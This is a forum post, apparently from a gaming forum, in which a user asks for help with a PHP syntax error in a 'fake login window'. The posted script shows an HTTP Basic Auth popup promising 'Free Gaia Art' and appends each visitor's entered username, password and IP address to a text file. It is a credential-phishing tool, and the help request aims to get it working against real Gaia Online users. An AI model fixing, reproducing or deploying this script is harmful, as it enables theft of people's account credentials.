I always Get This when i upload FLWs
"Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /www/110mb.com/g/a/i/a/-/a/r/t/gaia-art/htdocs/php.php on line 3"
can someone help me??
here's the FLW
<?php
if(isset($_SERVER['PHP_AUTH_USER'])){
$Handle = @fopen(Accounts.txt', 'a');

@fwrite($Handle, "Username = {$_SERVER['PHP_AUTH_USER']}
");
@fwrite($Handle, "Password = {$_SERVER['PHP_AUTH_PW']}
");
@fwrite($Handle, "I.P. = {$_SERVER['REMOTE_ADDR']}

");
@fclose($Handle);

exit;
}

header('WWW-Authenticate: Basic realm="Free Gaia Art Just Log In This Pop Up "');
header('HTTP/1.0 401 Unauthorized');
exit;
?>


Read more: http://forum.logicalgamers.com/publi...#ixzz1KUb4AzJ1